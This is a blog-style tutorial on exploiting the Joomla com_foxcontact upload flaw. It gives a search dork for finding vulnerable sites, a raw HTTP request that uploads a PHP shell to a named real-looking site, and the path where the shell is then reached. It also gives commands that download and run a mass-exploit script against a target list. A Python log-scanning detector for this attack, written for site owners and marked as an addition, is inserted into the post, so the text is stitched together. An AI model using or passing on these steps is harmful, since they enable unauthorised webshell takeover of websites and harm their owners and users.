
Thursday, 11 June 2020

Joomla com_foxcontact exploit

Hello world! Today the admin is sharing a tutorial on the com_foxcontact exploit. It's an old exploit, but there's no harm in sharing it, hehe, so let's get straight to it, boss. By the way, the tools I use here are an HTTP header tool and the mass exploit by the guys at Indoxploit.

DORK: inurl:/index.php?option=com_foxcontact

First, use the HTTP header tool to upload the shell. You can use Burpsuite on a PC or Sandroproxy on Android.
Since I'm on Android, I'll show it here with Sandroproxy.
And this is my request from Sandroproxy:

------------------------------
POST https://joannarusin.com/components/com_foxcontact/lib/file-uploader.php?cid=0&mid=213&qqfile=shell.php HTTP/1.1
Host:joannarusin.com
User-Agent:Mozilla/5.0 (Windows NT 5.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-us,en;q=0.5
Accept-Encoding:gzip, deflate
Proxy-Connection:keep-alive
Referer:http://code.google.com/p/sandrop/
Cache-Control:no-cache
X-Requested-With:acr.browser.barebones
X-File-Name:shell.php
Content-Type:image/jpeg
Connection:keep-alive
Pragma:no-cache
Content-length:3

"Shell code goes here"
-------------------------------

In the POST line, don't forget to include the cid and mid in the URL. How do you find them?
Go to the target's homepage and view its source: press Ctrl+U on desktop, or type view-source: in front of the site address (view-source:localhost),
then search for <a name=" and the cid and mid will show up there.
Boss, the mid shows up but the cid doesn't? Then just set cid to 0, or the other way round if it's the mid that is empty, hehe.
Where do you access the shell? localhost/components/com_foxcontact/uploads/shell.php.

And now with the mass exploit made by Indoxploit. How to install it (Termux):

$ pkg install php
$ pkg install wget
$ wget https://raw.githubusercontent.com/kyo1337/com_foxcontact/master/com_foxcontact.php
$ php com_foxcontact.php list.txt


Then just copy the shell URL.
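Added example, not part of the original post or the Indoxploit tool: a Python check that site owners can run over web-server access logs to find the upload request and the follow-up shell access described above. It assumes the Apache/nginx "combined" log format; the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

UPLOADER = "/components/com_foxcontact/lib/file-uploader.php"
UPLOAD_DIR = "/components/com_foxcontact/uploads/"
# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Combined log format: ip - - [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return findings as (kind, client_ip, timestamp, filename, status)."""
    findings, uploaded = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)
        if method == "POST" and path.endswith(UPLOADER):
            for name in parse_qs(url.query).get("qqfile", []):
                if SCRIPT_EXT.search(name):  # script name passed to the uploader
                    uploaded.add(name.lower())
                    findings.append(("script_upload", ip, ts, name, int(status)))
        elif UPLOAD_DIR in path:
            name = path.rsplit("/", 1)[-1]
            if SCRIPT_EXT.search(name):  # a script requested from the upload folder
                kind = "uploaded_script_hit" if name.lower() in uploaded else "script_in_uploads"
                findings.append((kind, ip, ts, name, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [11/Jun/2020:10:01:02 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=0&mid=213&qqfile=shell.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jun/2020:10:01:09 +0000] "GET /components/com_foxcontact/uploads/shell.php HTTP/1.1" 200 1290 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [11/Jun/2020:10:05:00 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=0&mid=213&qqfile=cv.pdf HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [11/Jun/2020:10:06:00 +0000] "GET /components/com_foxcontact/uploads/a.phtml HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `script_upload` followed by an `uploaded_script_hit` with status 200 means the uploaded file was reachable and should be treated as a compromise; any script file found under the uploads folder deserves the same review.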


OK, that's all for this article, boss. Don't forget to like, comment and subscribe if you love the admin, because the admin will be holding a giveaway later. OK, bye.

